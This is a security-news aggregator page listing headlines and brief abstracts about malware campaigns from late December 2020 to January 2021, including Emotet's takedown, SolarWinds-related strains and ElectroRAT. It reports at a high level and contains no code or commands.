New research released today provides greater insight into the Emotet module created by law enforcement that will uninstall the malware from infected devices in April.BleepingComputer
January 29, 2021
Emotet - Soon to be Dead and Buried Full Text
Abstract
Emotet, one of the most active and dangerous botnets, has been taken down by international authorities, in an operation coordinated by Europol and Eurojust.Cyware Alerts - Hacker News
January 29, 2021
New Pro-Ocean malware worms through Apache, Oracle, Redis servers Full Text
Abstract
The financially-motivated Rocke hackers are using a new piece of cryptojacking malware called Pro-Ocean to target vulnerable instances of Apache ActiveMQ, Oracle WebLogic, and Redis.BleepingComputer
January 29, 2021
Pro-Ocean: Rocke Group’s New Cryptojacking Malware Full Text
Abstract
Pro-Ocean uses known vulnerabilities to target cloud applications. Additionally, it attempts to remove other malware and miners including Luoxk, BillGates, XMRig, and Hashfish before installation.Palo Alto Networks
January 29, 2021
New Malware Campaign Targeting Security Researchers Who is Working in Vulnerability Research Full Text
Abstract
The Threat Analysis Group has recently detected an ongoing campaign targeting the security researchers who are working on vulnerability analysis and development...Cyber Security News
January 29, 2021
Oscorp, a new Android malware targets Italian users Full Text
Abstract
Researchers at the Italian CERT warns of new Android malware dubbed Oscorp that abuses accessibility services for malicious purposes. Researchers from security firm AddressIntel spotted a new Android malware dubbed Oscorp, its name comes from the title...Security Affairs
January 28, 2021
Cryptojacking malware targeting cloud apps gets new upgrades, worming capability Full Text
Abstract
A piece of cryptojacking malware with a penchant for targeting the cloud has gotten some updates that makes it easier to spread and harder for organizations to detect when their cloud applications have been commandeered.SCMagazine
January 28, 2021
Babuk Locker: Mediocre, But Gets the Job Done Full Text
Abstract
The code, its execution, the ways the operators communicate with victims and the threats to the stolen data have been labeled “unprofessional.” This does not mean that the malware is harmless.Security Boulevard
January 28, 2021
Italy CERT Warns of a New Credential Stealing Android Malware Full Text
Abstract
Researchers have disclosed a new family of Android malware that abuses accessibility services in the device to hijack user credentials and record audio and video. Dubbed " Oscorp " by Italy's CERT-AGID, the malware "induce(s) the user to install an accessibility service with which [the attackers] can read what is present and what is typed on the screen." So named because of the title of the login page of its command-and-control (C2) server, the malicious APK (called "Assistenzaclienti.apk" or "Customer Protection") is distributed via a domain named "supportoapp[.]com," which upon installation, requests intrusive permissions to enable the accessibility service and establishes communications with a C2 server to retrieve additional commands. Furthermore, the malware repeatedly reopens the Settings screen every eight seconds until the user turns on permissions for accessibility and device usage statistics, thus pressurizing the uThe Hacker News
January 27, 2021
TeamTNT Cloaks Malware With Open-Source Tool Full Text
Abstract
The detection-evasion tool, libprocesshider, hides TeamTNT’s malware from process-information programs.Threatpost
January 27, 2021
Linux malware uses open-source tool to evade detection Full Text
Abstract
AT&T Alien Labs security researchers have discovered that the TeamTNT cybercrime group upgraded their Linux crypto-mining with open-source detection evasion capabilities.BleepingComputer
January 27, 2021
Cryptomining Malware Takes Center Stage Again Full Text
Abstract
Soaring bitcoin rates are motivating a large number of cybercriminals to resort to cryptomining, which has increased by 53% quarter-on-quarter in the final three months of 2020, as per a report by Avira.Cyware Alerts - Hacker News
January 26, 2021
DanaBot Malware Roars Back into Relevancy Full Text
Abstract
Sophisticated and dangerous, DanaBot has resurfaced after laying dormant for seven months.Threatpost
January 26, 2021
LuckyBoy Malvertising Campaign Employs Cloaking and Obfuscation Techniques Full Text
Abstract
Cybersecurity experts found a sophisticated malvertising campaign that comes with strong obfuscation techniques to avoid detection by security solutions in iOS, Android, and even Xbox systems.Cyware Alerts - Hacker News
January 26, 2021
Watch out as new Android malware spreads through WhatsApp Full Text
Abstract
As reported by researchers ReBensk and Lukas Stefanko, a new malware spreads through Whatsapp messages when it auto-replies to any messaging conversations using a malicious link that leads to a fake Huawei app.Hackread
January 26, 2021
Cryptomining DreamBus botnet targets Linux servers Full Text
Abstract
Researchers at Zscaler’s ThreatLabZ team recently analyzed a Linux-based malware family, tracked as DreamBus Botnet, which is a variant of SystemdMiner. The bot is composed of a series of ELF binaries and Unix shell scripts.Security Affairs
January 25, 2021
QNAP Network Devices Targeted by New Dovecat Malware Full Text
Abstract
QNAP is warning unsuspecting customers of an ongoing malware campaign that exploits NAS devices to mine bitcoin while hogging up the whole of CPU and memory resources.Cyware Alerts - Hacker News
January 25, 2021
Building towards the richest and most interconnected malware ecosystem Full Text
Abstract
During the last few months, VirusTotal has included additional meaningful relationships to create a rich ecosystem that interconnects samples, URLs, domains, and IP addresses.Virus Total
January 25, 2021
Twenty-three SUNBURST Targets Identified Full Text
Abstract
Researchers found that out of all the companies and organizations that installed a backdoored SolarWinds Orion update, the majority were never targeted by the threat actors using Sunburst.Netresec
January 24, 2021
Beware — A New Wormable Android Malware Spreading Through WhatsApp Full Text
Abstract
A newly discovered Android malware has been found to propagate itself through WhatsApp messages to other contacts in order to expand what appears to be an adware campaign. "This malware spreads via victim's WhatsApp by automatically replying to any received WhatsApp message notification with a link to [a] malicious Huawei Mobile app," ESET researcher Lukas Stefanko said. The link to the fake Huawei Mobile app, upon clicking, redirects users to a lookalike Google Play Store website. Once installed, the wormable app prompts victims to grant it notification access, which is then abused to carry out the wormable attack. Specifically, it leverages WhatApp's quick reply feature — which is used to respond to incoming messages directly from the notifications — to send out a reply to a received message automatically. Besides requesting permissions to read notifications, the app also requests intrusive access to run in the background as well as to draw over other apps,The Hacker News
January 23, 2021
Gamarue malware found in UK Govt-funded laptops for homeschoolers Full Text
Abstract
Reportedly, Bradford school employees received several laptops to aid in homeschooling vulnerable students. However, the laptops came pre-installed with the virus. Many school employees shared virus details on an online forum.Hackread
January 22, 2021
New FreakOut Malware Actively Targeting Linux Devices Full Text
Abstract
Researchers reported FreakOut botnet, whose capabilities range from scanning ports and stealing data to launching DDoS and cryptomining attacks, targets unpatched Linux systems.Cyware Alerts - Hacker News
January 22, 2021
More Malware May Be Lurking on Govt School Laptops Full Text
Abstract
Scheme to support remote learning backfiresInfosecurity Magazine
January 21, 2021
Dovecat crypto-miner is targeting QNAP NAS devices Full Text
Abstract
QNAP is warning customers of a new piece of malware dubbed Dovecat that is targeting NAS devices to mine cryptocurrency. Taiwanese vendor QNAP has published a security advisory to warn customers of a new piece of malware named Dovecat that is targeting...Security Affairs
January 21, 2021
SQL Server Malware Tied to Iranian Software Firm, Researchers Allege Full Text
Abstract
Researchers have traced the origins of a campaign – infecting SQL servers to mine cryptocurrency – back to an Iranian software firm.Threatpost
January 21, 2021
UK govt gives malware infected laptops to vulnerable students Full Text
Abstract
Some of the laptops distributed by the UK Department for Education (DfE) to vulnerable students have been found to be infected with malware as reported by the BBC.BleepingComputer
January 21, 2021
QNAP warns users to secure NAS devices against Dovecat malware Full Text
Abstract
QNAP urges customers to secure their network-attached storage (NAS) devices against an ongoing malware campaign that infects and exploits them to mine bitcoin without their knowledge.BleepingComputer
January 21, 2021
MrbMiner Crypto-Mining Malware Links to Iranian Software Company Full Text
Abstract
A relatively new crypto-mining malware that surfaced last year and infected thousands of Microsoft SQL Server (MSSQL) databases has now been linked to a small software development company based in Iran. The attribution was made possible due to an operational security oversight, said researchers from cybersecurity firm Sophos, that led to the company's name inadvertently making its way into the cryptominer code. First documented by Chinese tech giant Tencent last September, MrbMiner was found to target internet-facing MSSQL servers with the goal of installing a cryptominer, which hijacks the processing power of the systems to mine Monero and funnel them into accounts controlled by the attackers. The name "MrbMiner" comes after one of the domains used by the group to host their malicious mining software. "In many ways, MrbMiner's operations appear typical of most cryptominer attacks we've seen targeting internet-facing servers," said Gabor SzappaThe Hacker News
January 21, 2021
SolarWinds Attack: Microsoft sheds lights into Solorigate second-stage activation Full Text
Abstract
Microsoft's report provides details of the entire SolarWinds attack chain with a deep dive in the second-stage activation of malware and tools. Microsoft published a new report that includes additional details of the SolarWinds supply chain attack....Security Affairs
January 21, 2021
LuckyBoy Multi-stage Malvertising Campaign Targets iOS, Android, XBox Users Full Text
Abstract
Should it run on a target environment, the malware executes a tracking pixel programmed to redirect the user to malicious content, including phishing pages and fake software updates.Security Week
January 21, 2021
Hundreds of Networks Still Host Devices Infected With VPNFilter Malware Full Text
Abstract
The VPNFilter malware is still present in hundreds of networks and malicious actors could take control of the infected devices, according to researchers at cybersecurity firm Trend Micro.Security Week
January 20, 2021
ElectroRAT: Yet Another Golang Multi-Platform Malware Full Text
Abstract
Security experts have raised an alarm against a new threat, dubbed ElectroRat, luring Windows, Linux, and macOS users to download malicious applications to embezzle cryptocurrency.Cyware Alerts - Hacker News
January 20, 2021
Coin-Mining Malware Volumes Soar 53% in Q4 2020 Full Text
Abstract
Surging value of digital currencies is sparking fresh interestInfosecurity Magazine
January 19, 2021
Fourth SolarWinds malware strain shows diversity of tactics Full Text
Abstract
While Teardrop was delivered by the original Sunburst backdoor in early July 2020, Raindrop was used just under two weeks later for spreading laterally across the victim’s network, Symantec said in a report.SCMagazine
January 19, 2021
Fourth SolarWinds malware strain shows diversity of tactics, need to focus on detection, response Full Text
Abstract
Researchers have found a fourth strain of malware – Raindrop – that was used in the SolarWinds supply chain attack, a loader similar to the Teardrop tool. But while Teardrop was delivered by the original Sunburst backdoor in early July 2020, Raindrop was used just under two weeks later for spreading laterally across the victim’s…SCMagazine
January 19, 2021
Raindrop, a fourth malware employed in SolarWinds attacks Full Text
Abstract
The threat actors behind the SolarWinds attack used malware dubbed Raindrop for lateral movement and deploying additional payloads. Security experts from Symantec revealed that threat actors behind the SolarWinds supply chain attack leveraged a malware...Security Affairs
January 19, 2021
SolarWinds Malware Arsenal Widens with Raindrop Full Text
Abstract
The post-compromise backdoor installs Cobalt Strike to help attackers more laterally through victim networks.Threatpost
January 19, 2021
Researchers Discover Raindrop — 4th Malware Linked to the SolarWinds Attack Full Text
Abstract
Cybersecurity researchers have unearthed a fourth new malware strain—designed to spread the malware onto other computers in victims' networks—which was deployed as part of the SolarWinds supply chain attack disclosed late last year. Dubbed "Raindrop" by Broadcom-owned Symantec, the malware joins the likes of other malicious implants such as Sunspot , Sunburst (or Solorigate), and Teardrop that were stealthily delivered to enterprise networks. The latest finding comes amid a continued probe into the breach, suspected to be of Russian origin , that has claimed a number of U.S. government agencies and private sector companies. "The discovery of Raindrop is a significant step in our investigation of the SolarWinds attacks as it provides further insights into post-compromise activity at organizations of interest to the attackers," Symantec researchers said . The cybersecurity firm said it discovered only four samples of Raindrop to date that were used to dThe Hacker News
January 19, 2021
Google Removed 164 Apps Downloaded a Total of 10 Million Times From Google Play Full Text
Abstract
Google has recently removed 164 Apps from Google Play since they were showing disruptive ads, which is considered as malicious. These apps...Cyber Security News
January 19, 2021
Researchers Identify Fourth Malware Strain Named Raindrop in SolarWinds Attack Full Text
Abstract
Symantec identified another malware strain that was used during the SolarWinds supply chain attack, bringing the total number to four, after the likes of Sunspot, Sunburst (Solorigate), and Teardrop.ZDNet
January 19, 2021
FreakOut malware exploits critical bugs to infect Linux hosts Full Text
Abstract
An active malicious campaign is currently targeting Linux devices running software with critical vulnerabilities that is powering network-attached storage (NAS) devices or for developing web applications and portals.BleepingComputer
January 19, 2021
Researchers Discover New Malicious Push Notification Campaign Rapidly Growing In Size Full Text
Abstract
Indelible discovered the “PushBug” campaign, which is a highly resilient operation, spread across more than 100 domains and installing browser-based activity that is difficult to detect.Yahoo! Finance
January 19, 2021
FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities Full Text
Abstract
An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in Linux devices to co-opt the systems into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency. The attacks involve a new malware variant called " FreakOut " that leverages newly patched flaws in TerraMaster, Laminas Project (formerly Zend Framework), and Liferay Portal, according to Check Point Research's new analysis published today and shared with The Hacker News. Attributing the malware to be the work of a long-time cybercrime hacker — who goes by the aliases Fl0urite and Freak on HackForums and Pastebin as early as 2015 — the researchers said the flaws — CVE-2020-28188 , CVE-2021-3007 , and CVE-2020-7961 — were weaponized to inject and execute malicious commands in the server. Regardless of the vulnerabilities exploited, the end goal of the attacker appears to be to download and execute a Python script named &quoThe Hacker News
January 18, 2021
Rogue: The Evolution of Next Level Malware Development Package Full Text
Abstract
The Rogue malware targets Android devices with a keylogger, allowing attackers to monitor the use of websites and apps to steal login credentials and other sensitive data.Cyware Alerts - Hacker News
January 16, 2021
TA551 Now Spreading IcedID Stealer via Spoofed Emails Full Text
Abstract
Cybercriminal group TA551 was found hijacking an ongoing email conversation to spread information-stealing malware such as Ursnif, Valak, and IcedID, Palo Alto Networks revealed.Cyware Alerts - Hacker News
January 15, 2021
Expert launched Malvuln, a project to report flaws in malware Full Text
Abstract
The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.com, the first platform exclusively dedicated...Security Affairs
January 15, 2021
Google Boots 164 Apps from Play Marketplace for Shady Ad Practices Full Text
Abstract
The tech giant removes 164 more offending Android apps after banning software showing this type of behavior from the store last year.Threatpost
January 15, 2021
Researchers Disclose Undocumented Chinese Malware Used in Recent Attacks Full Text
Abstract
Cybersecurity researchers have disclosed a series of attacks by a threat actor of Chinese origin that has targeted organizations in Russia and Hong Kong with malware — including a previously undocumented backdoor. Attributing the campaign to Winnti (or APT41), Positive Technologies dated the first attack to May 12, 2020, when the APT used LNK shortcuts to extract and run the malware payload. A second attack detected on May 30 used a malicious RAR archive file consisting of shortcuts to two bait PDF documents claimed to be a curriculum vitae and an IELTS certificate. The shortcuts themselves contain links to pages hosted on Zeplin, a legitimate collaboration tool for designers and developers that are used to fetch the final-stage malware that, in turn, includes a shellcode loader ("svchast.exe") and a backdoor called Crosswalk ("3t54dE3r.tmp"). Crosswalk, first documented by FireEye in 2017, is a bare-bones modular backdoor capable of carrying out system rThe Hacker News
January 14, 2021
New Malware That Uses WiFi BSSID to Determine the Victim’s Location Full Text
Abstract
The cybersecurity researchers at SANS Internet Storm Center’s Xavier Mertens recently recognized malware that utilizes an exciting method to discover the victim’s...Cyber Security News
January 14, 2021
Operation Spalax, an ongoing malware campaign targeting Colombian entities Full Text
Abstract
Security experts from ESET uncovered an ongoing surveillance campaign, dubbed Operation Spalax, against Colombian government institutions and private companies. Malware researchers from ESET uncovered an ongoing surveillance campaign, dubbed Operation...Security Affairs
January 14, 2021
Experts Uncover Malware Attacks Against Colombian Government and Companies Full Text
Abstract
Cybersecurity researchers took the wraps off an ongoing surveillance campaign directed against Colombian government institutions and private companies in the energy and metallurgical industries. In a report published by ESET on Tuesday, the Slovak internet security company said the attacks — dubbed " Operation Spalax " — began in 2020, with the modus operandi sharing some similarities to an APT group targeting the country since at least April 2018, but also different in other ways. The overlaps come in the form of phishing emails, which have similar topics and pretend to come from some of the same entities that were used in a February 2019 operation disclosed by QiAnXin researchers , and subdomain names used for command-and-control (C2) servers. However, the two campaigns diverge in the attachments used for phishing emails, the remote access trojans (RATs) deployed, and the C2 infrastructure employed to fetch the malware dropped. The attack chain begins with the targetThe Hacker News
January 14, 2021
‘Rogue’ Android RAT Can Take Control of Devices, Steal Data Full Text
Abstract
Dubbed Rogue, the Trojan is the work of Triangulum and HeXaGoN Dev, known Android malware authors that have been selling their malicious products on underground markets for several years.Security Week
January 13, 2021
Sunspot malware scoured servers for SolarWinds builds that it could weaponize Full Text
Abstract
Software company says 2 customer inquires, in hindsight, appear linked to supply-chain attackSCMagazine
January 13, 2021
Rogue Android RAT emerges from the darkweb Full Text
Abstract
Experts discovered an Android Remote Access Trojan, dubbed Rogue, that can allow to take over infected devices and steal user data. Rogue is a new mobile RAT discovered by researchers from Check Point while investigating the activity of the darknet...Security Affairs
January 13, 2021
#COVID19 Led to Surge in Malware Attacks Last Year Full Text
Abstract
Malware authors continued to use COVID-19 lures to launch attacksInfosecurity Magazine
January 13, 2021
Lokibot Stealer Comes with Added Features to Hide Better While Attacking Targets Full Text
Abstract
The developers of one of the infamous information-stealers in the malware landscape have added a third stage to its process of compromising systems, along with more encryption, as a way to escape detection.Cyware Alerts - Hacker News
January 12, 2021
This Android malware claims to give hackers full control of your smartphone Full Text
Abstract
The 'Rogue' RAT infects victims with a keylogger, allowing attackers to easily monitor the use of websites and apps in order to steal usernames and passwords, as well as financial data.ZDNet
January 12, 2021
New Sunspot malware found while investigating SolarWinds hack Full Text
Abstract
Cybersecurity firm CrowdStrike has discovered the malware used by the SolarWinds hackers to inject backdoors in Orion platform builds during the supply-chain attack that led to the compromise of several companies and government agencies.BleepingComputer
January 12, 2021
Sunspot, the third malware involved in the SolarWinds supply chain attack Full Text
Abstract
Cybersecurity firm CrowdStrike announced to have discovered a third malware strain, named Sunspot, directly involved in the SolarWinds supply chain attack. According to a new report published by the cybersecurity firm Crowdstrike, a third malware,...Security Affairs
January 12, 2021
Experts Sound Alarm On New Android Malware Sold On Hacking Forums Full Text
Abstract
Cybersecurity researchers have exposed the operations of an Android malware vendor who teamed up with a second threat actor to market and sell a remote access Trojan (RAT) capable of device takeover and exfiltration of photos, locations, contacts, and messages from popular apps such as Facebook, Instagram, WhatsApp, Skype, Telegram, Kik, Line, and Google Messages. The vendor, who goes by the name of " Triangulum " in a number of darknet forums, is alleged to be a 25-year-old man of Indian origin, with the individual opening up shop to sell the malware three years ago on June 10, 2017, according to an analysis published by Check Point Research today. "The product was a mobile RAT, targeting Android devices and capable of exfiltration of sensitive data from a C&C server, destroying local data – even deleting the entire OS, at times," the researchers said. An Active Underground Market for Mobile Malware Piecing together Triangulum's trail of activities, tThe Hacker News
January 12, 2021
Third Malware Strain Discovered as Part of SolarWinds Attack Full Text
Abstract
Sunspot used to inject Sunburst into Orion platform, says CrowdStrikeInfosecurity Magazine
January 12, 2021
Third Malware Strain Sunspot Discovered in SolarWinds Supply Chain Attack Full Text
Abstract
CrowdStrike, one of the companies directly involved in investigating the SolarWinds supply chain attack, said today it identified a third malware strain directly involved in the recent hack.ZDNet
January 11, 2021
Unveiled: SUNSPOT Malware Was Used to Inject SolarWinds Backdoor Full Text
Abstract
As the investigation into the SolarWinds supply-chain attack continues, cybersecurity researchers have disclosed a third malware strain that was deployed into the build environment to inject the backdoor into the company's Orion network monitoring platform. Called " Sunspot ," the backdoor adds to a growing list of previously disclosed malicious software such as Sunburst and Teardrop. "This highly sophisticated and novel code was designed to inject the Sunburst malicious code into the SolarWinds Orion Platform without arousing the suspicion of our software development and build teams," SolarWinds' new CEO Sudhakar Ramakrishna explained . While preliminary evidence found that operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, the latest findings reveal a new timeline that establishes the first breach ofThe Hacker News
January 11, 2021
Microsoft Sysmon now detects malware process tampering attempts Full Text
Abstract
Microsoft has released Sysmon 13 with a new security feature that detects if a process has been tampered using process hollowing or process herpaderping techniques.BleepingComputer
January 11, 2021
Mac malware uses ‘run-only’ AppleScripts to evade analysis Full Text
Abstract
A cryptocurrency mining campaign targeting macOS is using malware that has evolved into a complex variant giving researchers a lot of trouble analyzing it.BleepingComputer
January 11, 2021
xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement Full Text
Abstract
The actor used the BumbleBee webshell to upload and download files to and from the compromised Exchange server, but more importantly, to move laterally to other servers on the network.Palo Alto Networks
January 11, 2021
Researchers Find Links Between Sunburst and Russian Kazuar Malware Full Text
Abstract
Cybersecurity researchers, for the first time, may have found a potential connection between the backdoor used in the SolarWinds hack to a previously known malware strain. In new research published by Kaspersky researchers today, the cybersecurity firm said it discovered several features that overlap with another backdoor known as Kazuar , a .NET-based malware first documented by Palo Alto Networks in 2017. Disclosed early last month, the espionage campaign was notable for its scale and stealth, with the attackers leveraging the trust associated with SolarWinds Orion software to infiltrate government agencies and other companies so as to deploy a custom malware codenamed "Sunburst." Shared Features Between Sunburst and Kazuar Attribution for the SolarWinds supply-chain compromise has been difficult in part due to little-to-no clues linking the attack infrastructure to previous campaigns or other well-known threat groups. But Kaspersky's latest analysis of thThe Hacker News
January 11, 2021
Source code for malware that targets Qiui Cellmate device was leaked online Full Text
Abstract
The source code for the ChastityLock ransomware that was used in attacks aimed at the users of the Qiui Cellmate adult toy is now publicly available. Recently a family of ransomware was observed targeting the users of the Bluetooth-controlled Qiui...Security Affairs
January 11, 2021
Fake Trump’s Scandal Video Used to Deliver QNode Malware Full Text
Abstract
The cybersecurity researchers at Trustwave have identified a new Mailspam campaign while reviewing a spam trap. However, this campaign shares a remote...Cyber Security News
January 10, 2021
Golang-based Malware Trends Among Cyberattackers Full Text
Abstract
The multi-variate language enables a single malware codebase to be compiled into versions for all major operating systems such as Linux, Windows, and Mac.Cyware Alerts - Hacker News
January 9, 2021
Emotet remains the biggest malicious threat to your network in 2021 Full Text
Abstract
A malicious spam campaign that targeted over a hundred thousand users a day over Christmas and New Year has seen Emotet secure its spot as the most prolific malware threat.ZDNet
January 8, 2021
Malware variant becomes world’s most popular, thanks to ransomware surge Full Text
Abstract
Ransomware actors are laundering hundreds of millions of dollars through pseudo-legitimate cryptocurrency exchanges, while early-stage malware that is often used to facilitate their attacks have become the most popular forms of malware in the world.SCMagazine
January 8, 2021
Malicious Software Infrastructure Easier to Get and Deploy Than Ever Full Text
Abstract
Researchers at Recorded Future report a rise in cracked Cobalt Strike and other open-source adversarial tools with easy-to-use interfaces.Threatpost
January 8, 2021
FBI Warns of Egregor Attacks on Businesses Worldwide Full Text
Abstract
The agency said the malware has already compromised more than 150 organizations and provided insight into its ransomware-as-a-service behavior.Threatpost
January 8, 2021
President Trump-themed Malspam Email Delivers QRat trojan Full Text
Abstract
Cybersecurity researchers revealed a new QRat malspam campaign purporting to contain a scandalous video of the U.S. President Donald Trump.Cyware Alerts - Hacker News
January 8, 2021
December 2020’s Most Wanted Malware: Emotet Returns as Top Malware Threat Full Text
Abstract
First identified in 2014, Emotet has been regularly updated by its developers. The DHS has estimated that each incident involving Emotet costs organizations upwards of $1 million dollars to rectify.Check Point Research
January 8, 2021
Emotet Tops Malware Charts in December After Reboot Full Text
Abstract
Check Point reveals Trojan has had another makeoverInfosecurity Magazine
January 8, 2021
Minecraft-Themed Fleeceware Apps Hide Steep Fees Full Text
Abstract
A fleeceware app isn’t traditional Android malware in the sense that it doesn’t contain malicious code. Instead, the threat comes from excessive subscription fees that it might not clearly advertise.Security Intelligence
January 8, 2021
Cobalt Strike and Metasploit accounted for a quarter of all malware C&C servers in 2020 Full Text
Abstract
The penetration testing toolkits have been used to host more than a quarter of all the malware C&C servers deployed in 2020, threat intelligence firm Recorded Future said in a report today.ZDNet
January 8, 2021
Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer Full Text
Abstract
The “customers,” also known as the attackers, contact Oski authors on underground forums to purchase the malware and, once purchased, they configure it and distribute it to their victims.Cyberark
January 8, 2021
Ezuri memory loader used in Linux and Windows malware Full Text
Abstract
Multiple threat actors have recently started using the Ezuri memory loader as a loader to executes malware directly into the victims' memory. According to researchers from AT&T’s Alien Labs, malware authors are choosing the Ezuri memory loader...Security Affairs
January 7, 2021
Malspam campaign spoofs email chains to install IcedID info-stealer Full Text
Abstract
A phishing campaign has been disguising its spam as an email chain, using messages taken from email clients on previously compromised hosts.SCMagazine
January 7, 2021
Trump Sex Scandal Video Is a RAT Full Text
Abstract
Cyber-attackers lure victims with promise of sex video starring President TrumpInfosecurity Magazine
January 07, 2021
Linux malware authors use Ezuri Golang crypter for zero detection Full Text
Abstract
Multiple malware authors are using the "Ezuri" crypter and memory loader written in Go to evade detection by antivirus products. Source code for Ezuri is available on GitHub for anyone to use.BleepingComputer
January 7, 2021
A Deep Dive into Lokibot Infection Chain Full Text
Abstract
This sample is using the known technique of blurring images in documents to encourage users to enable macros. While quite simple this is fairly common and effective against users.Talos
January 7, 2021
Operation ElectroRAT – Attacker Creates Fake Companies to Steal Cryptocurrencies Full Text
Abstract
Security researchers at Intezer Labs had discovered a Remote Access Trojan (RAT). The attacker behind this operation has enticed cryptocurrency users to download...Cyber Security News
January 6, 2021
It’s Not the Trump Sex Tape, It’s a RAT Full Text
Abstract
Criminals are using the end of the Trump presidency to deliver a new remote-access trojan (RAT) variant disguised as a sex video of the outgoing POTUS, researchers report.Threatpost
January 6, 2021
ElectroRAT Drains Crypto Wallets Full Text
Abstract
Attacker creates fake companies and new remote access tool to steal cryptocurrency in year-long campaignInfosecurity Magazine
January 6, 2021
New Golang Worm Drops XMRig Miner Full Text
Abstract
A new worm written in Golang turns Windows and Linux servers into XMRig Miner. Researchers say it may be preparing to target additional weak configured services in its future updates.Cyware Alerts - Hacker News
January 6, 2021
Fake Trump sex video used to spread QNode RAT Full Text
Abstract
Researchers uncovered a malspam campaign that spreads the QNode remote access Trojan (RAT) using fake Trump's sex scandal video as bait. Security experts from Trustwave uncovered a malspam campaign that is delivering the QNode remote access Trojan...Security Affairs
January 06, 2021
Hackers Using Fake Trump’s Scandal Video to Spread QNode Malware Full Text
Abstract
Cybesecurity researchers today revealed a new malspam campaign that distributes a remote access Trojan (RAT) by purporting to contain a sex scandal video of U.S. President Donald Trump. The emails, which carry with the subject line "GOOD LOAN OFFER!!," come attached with a Java archive (JAR) file called "TRUMP_SEX_SCANDAL_VIDEO.jar," which, when downloaded, installs Qua or Quaverse RAT ( QRAT ) onto the infiltrated system. "We suspect that the bad guys are attempting to ride the frenzy brought about by the recently concluded Presidential elections since the filename they used on the attachment is totally unrelated to the email's theme," Trustwave's Senior Security Researcher Diana Lopera said in a write-up published today. The latest campaign is a variant of the Windows-based QRAT downloader Trustwave researchers discovered in August. The infection chain starts with a spam message containing an embedded attachment or a link pointing to a mThe Hacker News
January 6, 2021
Bogus CSS Injection Leads to Stolen Credit Card Details Full Text
Abstract
Attackers leverage holes in default security configurations on Magento stores to inject a CSS code that has the capability to siphon off the credit card details of unsuspecting users.Sucuri
January 6, 2021
Researchers Disclose Details of FIN7 Hacking Group’s Malware Full Text
Abstract
Researchers at Morphisec Labs have published fresh details about a malware variant called JSSLoaderwritten in the .NET language, that the FIN7 hacking group has used for several years.Gov Info Security
January 5, 2021
Thousands infected by trojan that targets cryptocurrency users on Windows, Mac and Linux Full Text
Abstract
A new remote access trojan (RAT) lures cryptocurrency users to download trojanized apps by promoting the apps in dedicated online forums and on social media.SCMagazine
January 5, 2021
New ElectroRAT employed in a wide-ranging operation targeting cryptocurrency users Full Text
Abstract
Researchers uncovered a large scale operation targeting cryptocurrency users with a previously undetected multiplatform RAT named ElectroRAT. Security researchers from Intezer uncovered a large scale operation targeting cryptocurrency users with a previously...Security Affairs
January 05, 2021
Australian cybersecurity agency used as cover in malware campaign Full Text
Abstract
The Australian government warns of an ongoing campaign impersonating the Australian Cyber Security Centre (ACSC) to infect targets with malware.BleepingComputer
January 05, 2021
Cross-platform ElectroRAT malware drains cryptocurrency wallets Full Text
Abstract
Security researchers have discovered a new remote access trojan (RAT) used to empty the cryptocurrency wallets of thousands of Windows, Linux, and macOS users.BleepingComputer
January 05, 2021
Warning: Cross-Platform ElectroRAT Malware Targeting Cryptocurrency Users Full Text
Abstract
Cybersecurity researchers today revealed a wide-ranging scam targeting cryptocurrency users that began as early as January last year to distribute trojanized applications to install a previously undetected remote access tool on target systems. Called ElectroRAT by Intezer, the RAT is written from ground-up in Golang and designed to target multiple operating systems such as Windows, Linux, and macOS. The apps are developed using the open-source Electron cross-platform desktop app framework. "ElectroRAT is the latest example of attackers using Golang to develop multi-platform malware and evade most antivirus engines," the researchers said . "It is common to see various information stealers trying to collect private keys to access victims wallets. However, it is rare to see tools written from scratch and targeting multiple operating systems for these purposes." The campaign, first detected in December, is believed to have claimed over 6,500 victims based on thThe Hacker News
January 5, 2021
ElectroRAT Drains Cryptocurrency Wallet Funds of Thousands Full Text
Abstract
At least 6,500 cryptocurrency users have been infected by new, ‘extremely intrusive’ malware that’s spread via trojanized macOS, Windows and Linux apps.Threatpost
January 5, 2021
Malware uses WiFi BSSID for victim identification Full Text
Abstract
In a blog post last month, Xavier Mertens, a security researcher with the SANS Internet Storm Center, said he discovered a new malware strain that is using WiFi BSSID for victim identification.ZDNet
January 4, 2021
SolarWinds mess flared in the holidays - company confirms malware targeted crocked Orion product Full Text
Abstract
The extent and impact of the SolarWinds hack became even more apparent – and terrifying – over the holiday break. On New Year’s Eve, SolarWinds confirmed that it has identified malware that exploited the flaws introduced to Orion products.The Register
January 4, 2021
New alleged MuddyWater attack downloads a PowerShell script from GitHub Full Text
Abstract
This PowerShell script is also used by threat actors to download a legitimate image file from image hosting service Imgur and decode an embedded Cobalt Strike script to target Windows systems.Security Affairs
January 4, 2021
A closer look at fileless malware, beyond the network Full Text
Abstract
Fileless malware is a bit of a misnomer. While traditional malware contains the bulk of its malicious code within an executable file saved to the victim’s storage drive, fileless malware’s malicious actions reside solely in memory.Help Net Security
January 4, 2021
New alleged MuddyWater attack downloads a PowerShell script from GitHub Full Text
Abstract
Security expert spotted a new piece of malware that leverages weaponized Word documents to download a PowerShell script from GitHub. Security expert discovered a new piece of malware uses weaponized Word documents to download a PowerShell...Security Affairs
January 2, 2021
A Credential Stealer Written in AutoHotkey Scripting Language Full Text
Abstract
Financial institutions in the U.S. and Canada are under threat from a new credential stealer that targets various browsers such as Chrome, Opera, and Microsoft Edge.Cyware Alerts - Hacker News
January 2, 2021
AutoHotkey-Based credential stealer targets bank in the US and Canada Full Text
Abstract
Experts spotted a new credential stealer written in AutoHotkey (AHK) scripting language that is targeting the US and Canadian bank customers. Security experts from Trend Micro have discovered a new credential stealer written in AutoHotkey (AHK) scripting...Security Affairs
January 1, 2021
New Malware Strain Abuses GitHub and Imgur Full Text
Abstract
Researchers reported a new strand of malware, purportedly by the MuddyWater APT group, that downloads a PowerShell script from GitHub, Imgur to targeted systems.Cyware Alerts - Hacker News
December 31, 2020
New Golang-based Crypto worm infects Windows and Linux servers Full Text
Abstract
